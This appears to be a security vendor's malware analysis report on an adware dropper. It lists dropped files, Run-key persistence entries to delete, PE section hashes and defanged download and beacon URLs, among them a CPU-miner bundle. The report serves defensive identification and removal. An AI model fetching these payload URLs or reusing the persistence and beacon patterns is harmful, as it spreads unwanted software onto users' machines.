%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf48.tmp (19514 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1B.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1E.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (3781 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-42CRH.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-QF5NP.tmp (15278 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-UJDHN.tmp (4185 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (1281 bytes)
%Program Files%\gmsd_re_005010096\is-QNSOT.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (1564 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-TA4AV.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-KNG9H.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (24230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (31996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (92311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp45.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3C.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\vos[1].htm (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\policyname[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrD.tmp (7695 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 11665408 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 11857920 | 17152 | 17408 | 4.10655 | a504ed888327f013e9b6042c9ab3920f |
Dropped from:
b94011d26f9ca72020b33e8540b8d716
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 12
cd94fdb6cad0a1bdfdd660de105c7c7e
9ffcde27b445393ee950de1371e7c43b
7975cef8969d02a0cabd784a3c74c8cb
6014e42e22c25611cc80146e840cbe2b
97e4952df76a56d68e69044e1a43d39f
9afaab770c0e2b9d5905c10288742f99
e9c53b8632b68f0292577f666a972eb4
6f4730a0be5e8067038de9457fdac074
e85909bb2d7c5931b7f2139fefceab0e
6cd2ca94541223158754aefc3f898dd4
8537c506876458e69f1ae9ab7fe92f6c
df84eb115ec1c2bc974734c43acd2d72
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.243.67.55 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.86.58 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.49 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.86.58 |
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
hxxp://ipgeoapi.com/ | 184.73.240.107 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=8819 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2919 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=1121 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=7294 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=2572 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=6565 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 | |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.174 |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8567 | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/v6/Bundle_CPUminer.exe | |
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.137.144 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI | 37.187.148.215 |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.137.144 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 188.165.236.39 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_FIN | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 | 37.187.148.215 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_DCOUNT1 | 37.187.148.215 |
hxxp://d10huri5h4o4a3.cloudfront.net/smt.exe | 54.239.168.217 |
hxxp://d2fpsq9kg43yka.cloudfront.net/sdk/binsis/2.2/BiTool.dll | 54.239.168.49 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.192.202.33 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 | 54.192.202.33 |
hxxp://d3oxtn1x3b8d7i.cloudfront.net/installers/bi_downloader/1443211351854/setup.exe | 54.192.202.33 |
hxxp://d10huri5h4o4a3.cloudfront.net/policyname.exe | 54.239.168.217 |
